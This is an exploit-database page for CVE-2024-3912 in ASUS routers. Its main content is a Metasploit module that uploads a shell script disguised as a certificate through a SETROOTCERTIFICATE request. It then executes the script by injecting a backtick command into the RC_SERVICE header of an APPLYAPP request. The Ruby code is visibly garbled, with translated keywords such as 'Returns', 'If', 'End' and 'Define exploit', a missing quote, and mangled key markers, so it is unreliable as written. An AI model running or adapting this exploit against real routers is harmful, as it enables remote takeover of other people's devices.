📄 ASUS Router Multi-Stage Command Injection

🗓️ 10 Mar 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 125 Views

ASUS router multi-stage injection enables code execution by uploading a script as a certificate and triggering it with a header.

Reporter	Title	Published	Views	Family All 10
GithubExploit	Exploit for CVE-2024-3912	6 Mar 202601:54	–	githubexploit
Circl	CVE-2024-3912	17 Jun 202409:54	–	circl
CNNVD	ASUS Router Code Issue Vulnerability	14 Jun 202400:00	–	cnnvd
CVE	CVE-2024-3912	14 Jun 202409:29	–	cve
Cvelist	CVE-2024-3912 ASUS Router - Upload arbitrary firmware	14 Jun 202409:29	–	cvelist
EUVD	EUVD-2024-32480	3 Oct 202520:07	–	euvd
NVD	CVE-2024-3912	14 Jun 202410:15	–	nvd
Positive Technologies	PT-2024-4209	14 Jun 202400:00	–	ptsecurity
The Hacker News	ASUS Patches Critical Authentication Bypass Flaw in Multiple Router Models	17 Jun 202414:39	–	thn
Vulnrichment	CVE-2024-3912 ASUS Router - Upload arbitrary firmware	14 Jun 202409:29	–	vulnrichment

=============================================================================================================================================
    | # Title     : Asus router Multi‑Stage Command Injection via SETROOTCERTIFICATE Leading to Remote Command Execution                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://router.asus.com/                                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    : A multi‑stage command injection vulnerability CVE-2024-3912 allows an attacker to achieve remote command execution on a vulnerable device by abusing the SETROOTCERTIFICATE and APPLYAPP HTTP methods. 
                     In the first stage, a malicious shell script is uploaded to the target system disguised as a certificate file through the SETROOTCERTIFICATE request. 
    				 The uploaded content is written to the filesystem where it can later be executed. In the second stage, the attacker triggers command execution by injecting 
    				 a shell command into the RC_SERVICE header using the APPLYAPP request, which executes the previously uploaded script. 
                     Successful exploitation results in arbitrary command execution with the privileges of the affected service.
    			  
    [+] POC   : 
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'Multi-Stage Command Injection Exploit (SETROOTCERTIFICATE)',
    'Description' => %q{
    This module exploits a multi-stage command injection vulnerability.
    Stage 1: Loads a script disguised as a certificate.
    
    Stage 2: Executes the script via RC_SERVICE command injection.
    
    },
    'Author' => [ 'indoushka' ],
    
    'License' => MSF_LICENSE,
    
    'Platform' => 'unix',
    
    'Arch' => ARCH_CMD,
    
    'Targets' => [ ['Generic Device', {}] ],
    
    'DefaultTarget' => 0,
    
    'DisclosureDate' => '2026-03-07'
    ))
    
    register_options(
    [
    Opt::RPORT(443),
    OptBool.new('SSL', [true, 'Use SSL/TLS', true])
    
    ]
    
    )
    end
    
    def check
    print_status("Checking the target's response...")
    
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '/')
    
    })
    
    Returns CheckCode::Unknown unless res
    
    If res.code == 200
    
    Returns CheckCode::Detected
    End
    
    CheckCode::Safe
    End
    
    Define exploit
    
    payload_body = <<~XML
    
    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    
    <content>
    
    <key>-----Beginning of private RSA key-----id</key>
    
    <cert><![CDATA[
    
    #!/bin/sh
    #{payload.encoded}
    
    ]]></cert>
    
    <intermediate_crt>-----Beginning of certificate-----</intermediate_crt>
    
    </content>
    
    XML
    
    print_status("Phase 1: Load payload via SETROOTCERTIFICATE")
    
    res = send_request_cgi({
    'method' => 'SETROOTCERTIFICATE',
    
    'uri' => normalize_uri(target_uri.path, '/favicon.ico/'),
    
    'data' => payload_body
    
    }, 20)
    
    unless res
    fail_with(Failure::Unreachable, "No response received from target")
    
    end
    
    print_good("Payload complete")
    
    Rex.sleep(1)
    
    print_status("Phase 2: Starting execution via APPLYAPP")
    
    res = send_request_cgi({
    'method' => 'APPLYAPP',
    
    uri' => normalize_uri(target_uri.path, '/favicon.ico/'),
    
    'headers' =>
    
    {
    'ACTION_MODE' => 'apply',
    
    'SET_NVRAM' => 'aa',
    
    'RC_SERVICE' => '`sh /etc/cert.pem.1`'
    
    }
    }, 20)
    
    unless res
    
    fail_with(Failure::Unreachable, "No response received during execution")
    end
    
    print_good("Exploitation request sent successfully")
    end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

10 Mar 2026 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 3.19.8

EPSS0.02093

SSVC